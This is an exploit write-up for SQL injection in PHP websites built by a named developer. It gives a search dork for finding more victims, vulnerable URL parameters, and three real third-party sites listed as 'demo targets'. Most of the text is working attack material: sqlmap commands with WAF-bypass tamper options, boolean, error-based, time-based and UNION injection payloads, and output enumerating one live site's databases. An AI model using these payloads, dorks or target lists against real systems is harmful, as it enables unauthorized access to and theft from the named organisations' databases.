# Exploit Title: Website Developed by Irsyadi Siradjuddin SQL Injection # Google Dork: intext:Developed by Irsyadi Siradjuddin # Date: 2020.05.05 # Exploit Author: Mr.Gagaltotal666 - gagaltotal.github.io # Vendor Homepage: https://irsyadi.com/ # Version PHP : PHP 5 # Tested on: BackBox 6 GNU/Linux # CVE : N/A POC : - www.target.com/berita_detail.php?ID=1[SQLi]['] - www.target.com/beritadtl.php?judul=hlm=1308[SQLi]['] Demo Target : - https://yapensa.or.id/berita_detail.php?ID=1 - https://www.jasuda.net/beritadtl.php?judul=Potensi,%20Produksi,%20dan%20Prospek%20Rumput%20Laut%20di%20Indonesia&hlm=1308 - https://agrotekuin.com/matakuliah_rps.php?ID=83 Poc SQLMAP : - sqlmap -u "example.com" --dbs - Bypass WAF : sqlmap -u "example.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=1' AND 1151=1151 AND 'uCJd'='uCJd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ID=1' AND (SELECT 4748 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT (ELT(4748=4748,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ndfp'='Ndfp Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ID=1' AND (SELECT 5294 FROM (SELECT(SLEEP(5)))PzWV) AND 'VsvN'='VsvN Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: ID=1' UNION ALL SELECT CONCAT(0x7170707a71,0x48485649454161426e6b7a756c524a5342706a644d415252704a6e5a66676d685a6669525142786c,0x71786b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [09:18:59] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 [09:19:00] [INFO] fetching database names available databases [2]: [*] h02087_yapensa [*] information_schema